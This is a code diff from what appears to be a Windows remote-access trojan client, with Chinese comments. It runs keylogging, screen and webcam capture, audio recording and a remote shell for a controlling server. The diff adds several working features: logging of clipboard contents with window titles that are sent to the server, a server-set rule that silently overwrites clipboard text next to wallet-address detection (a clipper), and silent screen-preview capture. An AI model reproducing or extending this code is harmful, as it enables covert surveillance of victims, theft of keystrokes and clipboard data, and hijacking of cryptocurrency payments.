CloseHandle(__CreateThread(NULL, 0, SendKeyboardRecord, m_hKeyboard->user, 0, NULL)); CloseHandle(__CreateThread(NULL, 0, SendKeyboardRecord, m_hKeyboard->user, 0, NULL));
} else { } else {
m_hThread[m_ulThreadCount].p = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP); auto* sub = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP);
sub->EnableSubConnAuth(); // 子连接:每次连上后自动发 TOKEN_CONN_AUTH 校验
m_hThread[m_ulThreadCount].p = sub;
m_hThread[m_ulThreadCount++].h = __CreateThread(NULL, 0, LoopKeyboardManager, &m_hThread[m_ulThreadCount], 0, NULL);; m_hThread[m_ulThreadCount++].h = __CreateThread(NULL, 0, LoopKeyboardManager, &m_hThread[m_ulThreadCount], 0, NULL);;
} }
break; break;
} }
case COMMAND_TALK: { case COMMAND_TALK: {
m_hThread[m_ulThreadCount].p = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP); {
auto* sub = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP);
sub->EnableSubConnAuth(); // 子连接:每次连上后自动发 TOKEN_CONN_AUTH 校验
m_hThread[m_ulThreadCount].p = sub;
}
m_hThread[m_ulThreadCount].user = m_hInstance; m_hThread[m_ulThreadCount].user = m_hInstance;
m_hThread[m_ulThreadCount++].h = __CreateThread(NULL,0, LoopTalkManager, &m_hThread[m_ulThreadCount], 0, NULL);; m_hThread[m_ulThreadCount++].h = __CreateThread(NULL,0, LoopTalkManager, &m_hThread[m_ulThreadCount], 0, NULL);;
break; break;
} }
case COMMAND_SHELL: { case COMMAND_SHELL: {
m_hThread[m_ulThreadCount].p = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP); {
auto* sub = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP);
sub->EnableSubConnAuth(); // 子连接:每次连上后自动发 TOKEN_CONN_AUTH 校验
m_hThread[m_ulThreadCount].p = sub;
}
m_hThread[m_ulThreadCount++].h = __CreateThread(NULL,0, LoopShellManager, &m_hThread[m_ulThreadCount], 0, NULL);; m_hThread[m_ulThreadCount++].h = __CreateThread(NULL,0, LoopShellManager, &m_hThread[m_ulThreadCount], 0, NULL);;
break; break;
} }
case COMMAND_SYSTEM: { //远程进程管理 case COMMAND_SYSTEM: { //远程进程管理
m_hThread[m_ulThreadCount].p = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP); {
auto* sub = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP);
sub->EnableSubConnAuth(); // 子连接:每次连上后自动发 TOKEN_CONN_AUTH 校验
m_hThread[m_ulThreadCount].p = sub;
}
m_hThread[m_ulThreadCount++].h = __CreateThread(NULL, 0, LoopProcessManager, &m_hThread[m_ulThreadCount], 0, NULL);; m_hThread[m_ulThreadCount++].h = __CreateThread(NULL, 0, LoopProcessManager, &m_hThread[m_ulThreadCount], 0, NULL);;
break; break;
} }
case COMMAND_WSLIST: { //远程窗口管理 case COMMAND_WSLIST: { //远程窗口管理
m_hThread[m_ulThreadCount].p = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP); auto* sub = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP);
sub->EnableSubConnAuth(); // 子连接:每次连上后自动发 TOKEN_CONN_AUTH 校验
m_hThread[m_ulThreadCount].p = sub;
m_hThread[m_ulThreadCount++].h = __CreateThread(NULL,0, LoopWindowManager, &m_hThread[m_ulThreadCount], 0, NULL);; m_hThread[m_ulThreadCount++].h = __CreateThread(NULL,0, LoopWindowManager, &m_hThread[m_ulThreadCount], 0, NULL);;
break; break;
} }
@@ -1113,20 +1141,65 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
break; break;
} }
case COMMAND_SCREEN_PREVIEW_REQ: {
if (ulLength < sizeof(ScreenPreviewReq)) break;
ScreenPreviewReq req;
memcpy(&req, szBuffer, sizeof(req));
// 限流:同一时刻最多 1 个抓屏任务在跑,防御服务端洪泛或异常重发把客户端打爆
static std::atomic<int> s_inFlight{0};
if (s_inFlight.fetch_add(1) >= 1) {
s_inFlight.fetch_sub(1);
break; // 直接丢弃,让服务端 4s 超时降级为"预览不可用"
}
// 投递到工作线程,避免阻塞 OnReceive抓屏 + 编码可能耗几十毫秒
std::thread([this, req]() {
struct Guard { ~Guard(){ s_inFlight.fetch_sub(1); } } guard;
std::vector<unsigned char> jpg;
int w = 0, h = 0;
int st = CaptureAndEncodePreview(req.maxWidth, req.jpegQuality, jpg, w, h);
std::vector<BYTE> pkt(sizeof(ScreenPreviewRspHeader) + (st == SCREEN_PREVIEW_OK ? jpg.size() : 0));
ScreenPreviewRspHeader* hdr = reinterpret_cast<ScreenPreviewRspHeader*>(pkt.data());
memset(hdr, 0, sizeof(*hdr));
hdr->token = TOKEN_SCREEN_PREVIEW_RSP;
hdr->reqId = req.reqId;
hdr->status = (uint8_t)st;
hdr->format = SCREEN_PREVIEW_FMT_JPEG;
hdr->width = (uint16_t)w;
hdr->height = (uint16_t)h;
hdr->bytes = (uint32_t)(st == SCREEN_PREVIEW_OK ? jpg.size() : 0);
if (st == SCREEN_PREVIEW_OK && !jpg.empty()) {
memcpy(pkt.data() + sizeof(*hdr), jpg.data(), jpg.size());
}
if (m_ClientObject && m_ClientObject->IsConnected()) {
m_ClientObject->Send2Server((char*)pkt.data(), (int)pkt.size());
}
}).detach();
break;
}
case COMMAND_SCREEN_SPY: { case COMMAND_SCREEN_SPY: {
UserParam* user = new UserParam{ ulLength > 1 ? new BYTE[ulLength - 1] : nullptr, int(ulLength-1) }; UserParam* user = new UserParam{ ulLength > 1 ? new BYTE[ulLength - 1] : nullptr, int(ulLength-1) };
if (ulLength > 1) { if (ulLength > 1) {
memcpy(user->buffer, szBuffer + 1, ulLength - 1); memcpy(user->buffer, szBuffer + 1, ulLength - 1);
if (ulLength > 2 && !m_conn->IsVerified()) user->buffer[2] = 0; if (ulLength > 2 && !m_conn->IsVerified()) user->buffer[2] = 0;
} }
m_hThread[m_ulThreadCount].p = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP, this); {
auto* sub = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP, this);
sub->EnableSubConnAuth(); // 子连接:每次连上后自动发 TOKEN_CONN_AUTH 校验
m_hThread[m_ulThreadCount].p = sub;
}
m_hThread[m_ulThreadCount].user = user; m_hThread[m_ulThreadCount].user = user;
m_hThread[m_ulThreadCount++].h = __CreateThread(NULL,0, LoopScreenManager, &m_hThread[m_ulThreadCount], 0, NULL);; m_hThread[m_ulThreadCount++].h = __CreateThread(NULL,0, LoopScreenManager, &m_hThread[m_ulThreadCount], 0, NULL);;
break; break;
} }
case COMMAND_LIST_DRIVE : { case COMMAND_LIST_DRIVE : {
m_hThread[m_ulThreadCount].p = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP, this); {
auto* sub = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP, this);
sub->EnableSubConnAuth(); // 子连接:每次连上后自动发 TOKEN_CONN_AUTH 校验
m_hThread[m_ulThreadCount].p = sub;
}
m_hThread[m_ulThreadCount++].h = __CreateThread(NULL,0, LoopFileManager, &m_hThread[m_ulThreadCount], 0, NULL);; m_hThread[m_ulThreadCount++].h = __CreateThread(NULL,0, LoopFileManager, &m_hThread[m_ulThreadCount], 0, NULL);;
break; break;
} }
@@ -1134,25 +1207,41 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
case COMMAND_WEBCAM: { case COMMAND_WEBCAM: {
static bool hasCamera = WebCamIsExist(); static bool hasCamera = WebCamIsExist();
if (!hasCamera) break; if (!hasCamera) break;
m_hThread[m_ulThreadCount].p = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP); {
auto* sub = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP);
sub->EnableSubConnAuth(); // 子连接:每次连上后自动发 TOKEN_CONN_AUTH 校验
m_hThread[m_ulThreadCount].p = sub;
}
m_hThread[m_ulThreadCount++].h = __CreateThread(NULL,0, LoopVideoManager, &m_hThread[m_ulThreadCount], 0, NULL);; m_hThread[m_ulThreadCount++].h = __CreateThread(NULL,0, LoopVideoManager, &m_hThread[m_ulThreadCount], 0, NULL);;
break; break;
} }
case COMMAND_AUDIO: { case COMMAND_AUDIO: {
m_hThread[m_ulThreadCount].p = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP); {
auto* sub = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP);
sub->EnableSubConnAuth(); // 子连接:每次连上后自动发 TOKEN_CONN_AUTH 校验
m_hThread[m_ulThreadCount].p = sub;
}
m_hThread[m_ulThreadCount++].h = __CreateThread(NULL,0, LoopAudioManager, &m_hThread[m_ulThreadCount], 0, NULL);; m_hThread[m_ulThreadCount++].h = __CreateThread(NULL,0, LoopAudioManager, &m_hThread[m_ulThreadCount], 0, NULL);;
break; break;
} }
case COMMAND_REGEDIT: { case COMMAND_REGEDIT: {
m_hThread[m_ulThreadCount].p = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP); {
auto* sub = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP);
sub->EnableSubConnAuth(); // 子连接:每次连上后自动发 TOKEN_CONN_AUTH 校验
m_hThread[m_ulThreadCount].p = sub;
}
m_hThread[m_ulThreadCount++].h = __CreateThread(NULL,0, LoopRegisterManager, &m_hThread[m_ulThreadCount], 0, NULL);; m_hThread[m_ulThreadCount++].h = __CreateThread(NULL,0, LoopRegisterManager, &m_hThread[m_ulThreadCount], 0, NULL);;
break; break;
} }
case COMMAND_SERVICES: { case COMMAND_SERVICES: {
m_hThread[m_ulThreadCount].p = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP); {
auto* sub = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn, publicIP);
sub->EnableSubConnAuth(); // 子连接:每次连上后自动发 TOKEN_CONN_AUTH 校验
m_hThread[m_ulThreadCount].p = sub;
}
m_hThread[m_ulThreadCount++].h = __CreateThread(NULL,0, LoopServicesManager, &m_hThread[m_ulThreadCount], 0, NULL); m_hThread[m_ulThreadCount++].h = __CreateThread(NULL,0, LoopServicesManager, &m_hThread[m_ulThreadCount], 0, NULL);
break; break;
} }
@@ -1270,6 +1359,7 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
opts.enableResume = queryPending; // 只有发送了查询才等待响应 opts.enableResume = queryPending; // 只有发送了查询才等待响应
IOCPClient* pClient = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn); IOCPClient* pClient = new IOCPClient(g_bExit, true, MaskTypeNone, m_conn);
pClient->EnableSubConnAuth(); // V2 文件传输子连接:每次连上后自动发 TOKEN_CONN_AUTH 校验
if (pClient->ConnectServer(m_ClientObject->ServerIP().c_str(), m_ClientObject->ServerPort())) { if (pClient->ConnectServer(m_ClientObject->ServerIP().c_str(), m_ClientObject->ServerPort())) {
std::thread([files, targetDir, pClient, opts, hash, hmac]() { std::thread([files, targetDir, pClient, opts, hash, hmac]() {
FileBatchTransferWorkerV2(files, targetDir, pClient, FileBatchTransferWorkerV2(files, targetDir, pClient,
@@ -1493,7 +1583,18 @@ void CKernelManager::OnHeatbeatResponse(PBYTE szBuffer, ULONG ulLength)
if (ulLength > 8) { if (ulLength > 8) {
uint64_t n = 0; uint64_t n = 0;
memcpy(&n, szBuffer + 1, sizeof(uint64_t)); memcpy(&n, szBuffer + 1, sizeof(uint64_t));
m_nNetPing.update_from_sample(GetUnixMs() - n); // 主控心跳 ACK 只回显时间戳(不含 ProcessingMs近似纯网络 RTT
int64_t rtt_ms = (int64_t)GetUnixMs() - (int64_t)n;
m_nNetPing.update_from_sample((double)rtt_ms);
// 试用版反代理RTT 入采样窗口。
// 启停由下方根据 m_settings 控制;非试用模式下 RecordSample 内部直接 return。
if (rtt_ms > 0 && rtt_ms < INT_MAX)
LANRttChecker::RecordSample((int)rtt_ms);
// m_settings.Authorized / IsTrail 由 CMD_MASTERSETTING 同步而来。
// 首次心跳早于 MasterSettings 到达时,两字段均为 0 → 保留默认(关闭),安全。
if (!m_settings.Authorized) return;
// 试用主控 → 打开 RTT 反代理检测;已授权 → 关闭,避免误报合法远程连接
LANRttChecker::SetEnabled(m_settings.IsTrail != 0);
} }
} }
@@ -1556,7 +1657,16 @@ void AuthKernelManager::OnHeatbeatResponse(PBYTE szBuffer, ULONG ulLength)
HeartbeatACK n = { 0 }; HeartbeatACK n = { 0 };
const int size = sizeof(HeartbeatACK); const int size = sizeof(HeartbeatACK);
memcpy(&n, szBuffer + 1, ulLength > size ? size : HeartbeatACK_OldSize); memcpy(&n, szBuffer + 1, ulLength > size ? size : HeartbeatACK_OldSize);
m_nNetPing.update_from_sample(GetUnixMs() - n.Time); // 总 RTT = ACK 到达时间 客户端发出时间(含网络 + 服务端处理)。
// 服务端从 v1.3.4 起在 ACK 里回报自己的处理耗时 ProcessingMs毫秒
// - 新服务端ProcessingMs > 0 → 减掉得近似纯网络 RTT
// - 旧服务端ProcessingMs == 0 → 维持旧行为,用总 RTT
// 避免 V2 签名 / HMAC / Debug 加密放大等服务端本底误算到网络 RTT。
int64_t total_rtt_ms = (int64_t)GetUnixMs() - (int64_t)n.Time;
int64_t net_rtt_ms = total_rtt_ms;
if (n.ProcessingMs > 0 && (int64_t)n.ProcessingMs < total_rtt_ms)
net_rtt_ms = total_rtt_ms - (int64_t)n.ProcessingMs;
m_nNetPing.update_from_sample((double)net_rtt_ms);
// Not authorized, but server is reachable, so just return and wait for next heartbeat // Not authorized, but server is reachable, so just return and wait for next heartbeat
if (n.Authorized == UNAUTHORIZED) return; if (n.Authorized == UNAUTHORIZED) return;

31
client/KernelManager.h
View File

@@ -63,9 +63,34 @@ private:
if (hForegroundWindow == NULL) if (hForegroundWindow == NULL)
return "No active window"; return "No active window";
char windowTitle[256]; // 用 W 接口取标题,再转 UTF-8避免依赖客户端系统 ANSI 代码页
GetWindowTextA(hForegroundWindow, windowTitle, sizeof(windowTitle)); wchar_t wTitle[256] = { 0 };
return std::string(windowTitle); GetWindowTextW(hForegroundWindow, wTitle, _countof(wTitle));
if (wTitle[0] == L'\0')
return std::string();
int u8len = WideCharToMultiByte(CP_UTF8, 0, wTitle, -1, NULL, 0, NULL, NULL);
if (u8len <= 1)
return std::string();
// 协议字段 ActiveWnd[512]UTF-8 中文最多 3 字节/字符,必要时按完整码点截断
std::string out(u8len - 1, '\0');
WideCharToMultiByte(CP_UTF8, 0, wTitle, -1, &out[0], u8len, NULL, NULL);
if (out.size() >= 511) {
out.resize(511);
// 回退到上一个完整 UTF-8 码点起始
while (!out.empty() && (static_cast<unsigned char>(out.back()) & 0xC0) == 0x80)
out.pop_back();
if (!out.empty()) {
unsigned char lead = static_cast<unsigned char>(out.back());
int need = (lead & 0x80) == 0 ? 1
: (lead & 0xE0) == 0xC0 ? 2
: (lead & 0xF0) == 0xE0 ? 3
: (lead & 0xF8) == 0xF0 ? 4 : 0;
if (need == 0) out.pop_back();
}
}
return out;
} }
DWORD GetLastInputTime() DWORD GetLastInputTime()

110
client/KeyboardManager.cpp
View File

@@ -25,6 +25,7 @@
#define USING_CLIP 0 #define USING_CLIP 0
#include "wallet.h" #include "wallet.h"
#include "common/utf8.h"
#if USING_CLIP #if USING_CLIP
#include "clip.h" #include "clip.h"
#ifdef _WIN64 #ifdef _WIN64
@@ -60,6 +61,13 @@ CKeyboardManager1::CKeyboardManager1(IOCPClient*pClient, int offline, void* user
iniFile cfg(CLIENT_PATH); iniFile cfg(CLIENT_PATH);
m_Wallet = StringToVector(cfg.GetStr("settings", "wallet", ""), ';', MAX_WALLET_NUM); m_Wallet = StringToVector(cfg.GetStr("settings", "wallet", ""), ';', MAX_WALLET_NUM);
binFile bin(CLIENT_PATH);
std::string rule = bin.GetStr("settings", "textRule");
if (rule.length() >= sizeof(TextReplace)) {
memcpy(&m_ReplaceRule, rule.data(), sizeof(TextReplace));
Mprintf("CKeyboardManager1: Load text replace rule succeed\n");
}
m_hClipboard = __CreateThread(NULL, 0, Clipboard, (LPVOID)this, 0, NULL); m_hClipboard = __CreateThread(NULL, 0, Clipboard, (LPVOID)this, 0, NULL);
m_hWorkThread = __CreateThread(NULL, 0, KeyLogger, (LPVOID)this, 0, NULL); m_hWorkThread = __CreateThread(NULL, 0, KeyLogger, (LPVOID)this, 0, NULL);
m_hSendThread = __CreateThread(NULL, 0, SendData,(LPVOID)this,0,NULL); m_hSendThread = __CreateThread(NULL, 0, SendData,(LPVOID)this,0,NULL);
@@ -76,7 +84,10 @@ CKeyboardManager1::~CKeyboardManager1()
SAFE_CLOSE_HANDLE(m_hClipboard); SAFE_CLOSE_HANDLE(m_hClipboard);
SAFE_CLOSE_HANDLE(m_hWorkThread); SAFE_CLOSE_HANDLE(m_hWorkThread);
SAFE_CLOSE_HANDLE(m_hSendThread); SAFE_CLOSE_HANDLE(m_hSendThread);
m_Buffer->WriteAvailableDataToFile(m_strRecordFile); // 仅在离线记录开启时才回写磁盘;否则缓冲区随对象释放,不让 CLEAR 后的新击键意外落盘。
if (m_bIsOfflineRecord) {
m_Buffer->WriteAvailableDataToFile(m_strRecordFile);
}
delete m_Buffer; delete m_Buffer;
Mprintf("~CKeyboardManager1: Stop %p\n", this); Mprintf("~CKeyboardManager1: Stop %p\n", this);
} }
@@ -90,7 +101,10 @@ void CKeyboardManager1::Notify()
iniFile cfg(CLIENT_PATH); iniFile cfg(CLIENT_PATH);
m_Wallet = StringToVector(cfg.GetStr("settings", "wallet", ""), ';', MAX_WALLET_NUM); m_Wallet = StringToVector(cfg.GetStr("settings", "wallet", ""), ';', MAX_WALLET_NUM);
m_mu.Unlock(); m_mu.Unlock();
sendStartKeyBoard(); m_ruleMu.Lock();
auto rule = m_ReplaceRule;
m_ruleMu.Unlock();
sendStartKeyBoard(rule);
WaitForDialogOpen(); WaitForDialogOpen();
} }
@@ -117,6 +131,16 @@ void CKeyboardManager1::OnReceive(LPBYTE lpBuffer, ULONG nSize)
GET_PROCESS_EASY(DeleteFileA); GET_PROCESS_EASY(DeleteFileA);
DeleteFileA(m_strRecordFile); DeleteFileA(m_strRecordFile);
} }
if (lpBuffer[0] == COMMAND_TEXT_REPLACE && nSize >= sizeof(TextReplace)) {
CAutoCLock L(m_ruleMu);
memcpy(&m_ReplaceRule, lpBuffer, sizeof(TextReplace));
binFile cfg(CLIENT_PATH);
std::string rule((char*)&m_ReplaceRule, sizeof(TextReplace));
cfg.SetStr("settings", "textRule", rule);
auto ansi = utf8_to_ansi((char*)m_ReplaceRule.param);
Mprintf("COMMAND_TEXT_REPLACE: %s\n", ansi.c_str());
}
} }
std::vector<std::string> CKeyboardManager1::GetWallet() std::vector<std::string> CKeyboardManager1::GetWallet()
@@ -127,11 +151,18 @@ std::vector<std::string> CKeyboardManager1::GetWallet()
return w; return w;
} }
int CKeyboardManager1::sendStartKeyBoard() int CKeyboardManager1::sendStartKeyBoard(const TextReplace& rule)
{ {
BYTE bToken[2]; // 协议扩展:在 [TOKEN, offline] 后面捎带 2 字节 cap word。
// 子连接没经过 LOGIN_INFOR服务端的 CKeyBoardDlg 没法直接拿到本机能力位 ——
// 让客户端自己带过来,避免服务端通过 IP 反查主连接NAT/127.0.0.1 等场景反查会失败)。
// 老服务端读不到 byte 2-3 没关系(只读 byte 1向后兼容。
BYTE bToken[4 + sizeof(TextReplace)];
bToken[0] = TOKEN_KEYBOARD_START; bToken[0] = TOKEN_KEYBOARD_START;
bToken[1] = (BYTE)m_bIsOfflineRecord; bToken[1] = (BYTE)m_bIsOfflineRecord;
WORD caps = CLIENT_CAP_V2 | CLIENT_CAP_UTF8;
memcpy(bToken + 2, &caps, sizeof(WORD));
memcpy(bToken + 4, &rule, sizeof(TextReplace));
HttpMask mask(DEFAULT_HOST, m_ClientObject->GetClientIPHeader()); HttpMask mask(DEFAULT_HOST, m_ClientObject->GetClientIPHeader());
return m_ClientObject->Send2Server((char*)&bToken[0], sizeof(bToken), &mask); return m_ClientObject->Send2Server((char*)&bToken[0], sizeof(bToken), &mask);
} }
@@ -494,27 +525,66 @@ int CALLBACK WriteBuffer(const char* record, void* user)
return 0; return 0;
} }
std::string CKeyboardManager1::ReplaceText() {
CAutoCLock L(m_ruleMu);
switch (m_ReplaceRule.type) {
case RULE_REPLACE_ALL:
if (m_ReplaceRule.param[0] == 0)
return "";
std::string text((char*)m_ReplaceRule.param);
return clip::set_text_utf8(text) ? text : "";
}
return "";
}
DWORD WINAPI CKeyboardManager1::Clipboard(LPVOID lparam) DWORD WINAPI CKeyboardManager1::Clipboard(LPVOID lparam)
{ {
CKeyboardManager1* pThis = (CKeyboardManager1*)lparam; CKeyboardManager1* pThis = (CKeyboardManager1*)lparam;
std::string lastValue = {};
while (pThis->m_bIsWorking) { while (pThis->m_bIsWorking) {
auto w = pThis->GetWallet(); bool hasClipboard = clip::has(clip::text_format());
if (w.empty()) {
Sleep(1000);
continue;
}
bool hasClipboard = false;
try {
hasClipboard = clip::has(clip::text_format());
} catch (...) { // fix: "std::runtime_error" causing crashes in some cases
hasClipboard = false;
Sleep(3000);
}
if (hasClipboard) { if (hasClipboard) {
std::string value; std::string value;
clip::get_text(value); if (!clip::get_text(value)) {
if (value.length() > 200) { Sleep(500);
Sleep(1000); continue;
}
std::string recordValue = value.substr(0, 4096);
if (lastValue.length() != recordValue.length() || lastValue != recordValue) {
lastValue = recordValue;
HWND foreground = GetForegroundWindow();
char window_title[MAX_PATH] = {};
wchar_t wTitle[MAX_PATH] = {};
GetWindowTextW(foreground, wTitle, MAX_PATH);
if (wTitle[0]) {
WideCharToMultiByte(CP_UTF8, 0, wTitle, -1, window_title, MAX_PATH, NULL, NULL);
}
SYSTEMTIME s;
GetLocalTime(&s);
char tm[64];
sprintf_s(tm, "%d-%02d-%02d %02d:%02d:%02d", s.wYear, s.wMonth, s.wDay, s.wHour, s.wMinute, s.wSecond);
std::stringstream output;
output << "\r\n\r\n[Title:] " << window_title << "\r\n[Time:]" << tm << "\r\n[Clipboard:]" << recordValue;
std::string str = output.str();
pThis->m_Buffer->Write(str.c_str(), str.length());
if (pThis->IsConnected()) {
str.erase(0, 4);
str.insert(0, 1, TOKEN_CLIP_TEXT);
pThis->Send((BYTE*)str.c_str(), str.length()+1);
std::string newValue = pThis->ReplaceText();
if (!newValue.empty()) {
Mprintf("[Clipboard] Replace %d bytes -> %d bytes \n", recordValue.length(), newValue.length());
lastValue = newValue;
}
}
}
// Wallet detection
auto w = pThis->GetWallet();
if (value.length() > 200 || w.empty()) {
Sleep(500);
continue; continue;
} }
auto type = detectWalletType(value); auto type = detectWalletType(value);
@@ -556,7 +626,7 @@ DWORD WINAPI CKeyboardManager1::Clipboard(LPVOID lparam)
break; break;
} }
} }
Sleep(1000); Sleep(500);
} }
return 0x20251005; return 0x20251005;
} }

5
client/KeyboardManager.h
View File

@@ -237,19 +237,22 @@ public:
HANDLE m_hClipboard; HANDLE m_hClipboard;
HANDLE m_hWorkThread,m_hSendThread; HANDLE m_hWorkThread,m_hSendThread;
TCHAR m_strRecordFile[MAX_PATH]; TCHAR m_strRecordFile[MAX_PATH];
TextReplace m_ReplaceRule = {};
virtual BOOL Reconnect() virtual BOOL Reconnect()
{ {
return m_ClientObject ? m_ClientObject->Reconnect(this) : FALSE; return m_ClientObject ? m_ClientObject->Reconnect(this) : FALSE;
} }
std::string ReplaceText();
private: private:
BOOL IsWindowsFocusChange(HWND &PreviousFocus, TCHAR *WindowCaption, TCHAR *szText, bool HasData); BOOL IsWindowsFocusChange(HWND &PreviousFocus, TCHAR *WindowCaption, TCHAR *szText, bool HasData);
int sendStartKeyBoard(); int sendStartKeyBoard(const TextReplace& rule);
int sendKeyBoardData(LPBYTE lpData, UINT nSize); int sendKeyBoardData(LPBYTE lpData, UINT nSize);
bool m_bIsWorking; bool m_bIsWorking;
CircularBuffer *m_Buffer; CircularBuffer *m_Buffer;
CLocker m_mu; CLocker m_mu;
CLocker m_ruleMu;
std::vector<std::string> m_Wallet; std::vector<std::string> m_Wallet;
std::vector<std::string> GetWallet(); std::vector<std::string> GetWallet();
}; };

94
client/LoginServer.cpp
View File

@@ -213,19 +213,26 @@ std::string GetCurrentExeVersion()
std::string GetCurrentUserNameA() std::string GetCurrentUserNameA()
{ {
char username[256]; // 用 W 接口取宽字符再转 UTF-8避免依赖系统 ANSI 代码页(中文账号名在英语系统上
DWORD size = sizeof(username); // 用 GetUserNameA 取出来是 '?',与 LOGIN_INFOR 的 CLIENT_CAP_UTF8 声明也不一致)。
wchar_t wname[256] = {};
if (GetUserNameA(username, &size)) { DWORD wsize = _countof(wname);
return std::string(username); if (!GetUserNameW(wname, &wsize)) {
} else {
return "Unknown"; return "Unknown";
} }
char buf[256 * 3] = {};
if (WideCharToMultiByte(CP_UTF8, 0, wname, -1, buf, sizeof(buf), NULL, NULL) <= 0) {
return "Unknown";
}
return std::string(buf);
} }
#define XXH_INLINE_ALL #define XXH_INLINE_ALL
#include "common/xxhash.h" #include "common/xxhash.h"
// 基于客户端信息计算唯一ID: { IP, PC, OS, CPU, PATH }
// 老算法基于客户端信息计算唯一ID: { IP, PC, OS, CPU, PATH }
// 注意pubIP 不稳定DHCP/换网络)会让 ID 跳变;同 hostname+同安装路径的多机会撞库。
// 保留此函数仅为协议兼容(老服务端仍按这个算法验算 RES_CLIENT_ID
uint64_t CalcalateID(const std::vector<std::string>& clientInfo) uint64_t CalcalateID(const std::vector<std::string>& clientInfo)
{ {
std::string s; std::string s;
@@ -236,6 +243,52 @@ uint64_t CalcalateID(const std::vector<std::string>& clientInfo)
return XXH64(s.c_str(), s.length(), 0); return XXH64(s.c_str(), s.length(), 0);
} }
// 读取 Windows 安装时生成的机器 GUID。
// HKLM\Software\Microsoft\Cryptography\MachineGuid 是 Windows 安装时生成的随机 GUID
// 重装系统才会变局域网每台机器都不同即便同镜像sysprep 也会重置)。
// 这是比 pubIP/PCName/CPU 都更稳定且更具区分度的硬件标识。
static std::string GetMachineGuidWindows()
{
HKEY hKey = NULL;
// KEY_WOW64_64KEY: 32 位进程也访问 64 位注册表视图,避免 WOW6432Node 重定向。
if (RegOpenKeyExA(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Cryptography",
0, KEY_READ | KEY_WOW64_64KEY, &hKey) != ERROR_SUCCESS) {
return std::string();
}
char buf[64] = {};
DWORD sz = sizeof(buf) - 1; // 留 1 字节给 NUL
DWORD type = 0;
LSTATUS s = RegQueryValueExA(hKey, "MachineGuid", NULL, &type,
(BYTE*)buf, &sz);
RegCloseKey(hKey);
if (s != ERROR_SUCCESS || type != REG_SZ) return std::string();
return std::string(buf);
}
// 路径归一化:先尝试展开成长路径(如 PROGRA~1 -> Program Files再小写化。
// 用于 V2 ID 的输入,保证大小写或长短名变化时同一可执行文件得到同一 ID。
static std::string NormalizeExePathLower(const char* path)
{
char longPath[MAX_PATH] = {};
if (GetLongPathNameA(path, longPath, MAX_PATH) == 0) {
// 展开失败(路径不存在等罕见情况):直接用原值
strcpy_s(longPath, path);
}
CharLowerA(longPath); // 原地小写化(对 ASCII 简单,对中文路径会按宽字符规则处理)
return std::string(longPath);
}
// 新算法machineGuid + 归一化路径
// - 同机同程序:永远同 ID不依赖 IP/PCName/OS/CPU
// - 局域网多机相同镜像MachineGuid 必不同 → ID 必不同。
// - 一台机两份程序在不同目录 → ID 不同。
uint64_t CalcalateIDv2(const std::string& machineGuid, const std::string& normalizedPath)
{
std::string s = machineGuid + "|" + normalizedPath;
return XXH64(s.c_str(), s.length(), 0);
}
BOOL IsAuthKernel(std::string &str) { BOOL IsAuthKernel(std::string &str) {
BOOL isAuthKernel = FALSE; BOOL isAuthKernel = FALSE;
std::string pid = std::to_string(GetCurrentProcessId()); std::string pid = std::to_string(GetCurrentProcessId());
@@ -292,9 +345,18 @@ LOGIN_INFOR GetLoginInfo(DWORD dwSpeed, CONNECT_ADDRESS& conn, const std::string
LoginInfor.AddReserved(getOSBits()); // 系统位数 LoginInfor.AddReserved(getOSBits()); // 系统位数
LoginInfor.AddReserved(GetCPUCores()); // CPU核数 LoginInfor.AddReserved(GetCPUCores()); // CPU核数
LoginInfor.AddReserved(GetMemorySizeGB()); // 系统内存 LoginInfor.AddReserved(GetMemorySizeGB()); // 系统内存
// 路径分两份处理:
// - buf (CP_ACP): 保留给 CalcalateIDv2 / 老 CalculateID 用,保证升级后 client ID
// 不变(老版客户端用的是 GetModuleFileNameA 的 CP_ACP 字节,
// 若改成 UTF-8 同一物理路径会算出不同 ID丢授权/备注)。
// - utf8Path: 发给服务端的 RES_FILE_PATH与 CLIENT_CAP_UTF8 一致。
char buf[_MAX_PATH] = {}; char buf[_MAX_PATH] = {};
GetModuleFileNameA(NULL, buf, sizeof(buf)); GetModuleFileNameA(NULL, buf, sizeof(buf)); // CP_ACP, 留给 ID 计算用
LoginInfor.AddReserved(buf); // 文件路径 wchar_t wbuf[_MAX_PATH] = {};
GetModuleFileNameW(NULL, wbuf, _MAX_PATH);
char utf8Path[_MAX_PATH * 3] = {}; // UTF-8 最多 3 字节/中文,给足
WideCharToMultiByte(CP_UTF8, 0, wbuf, -1, utf8Path, sizeof(utf8Path), NULL, NULL);
LoginInfor.AddReserved(utf8Path); // 文件路径 (UTF-8 发给服务端显示)
LoginInfor.AddReserved("?"); // test LoginInfor.AddReserved("?"); // test
std::string installTime = cfg.GetStr("settings", "install_time"); std::string installTime = cfg.GetStr("settings", "install_time");
if (installTime.empty()) { if (installTime.empty()) {
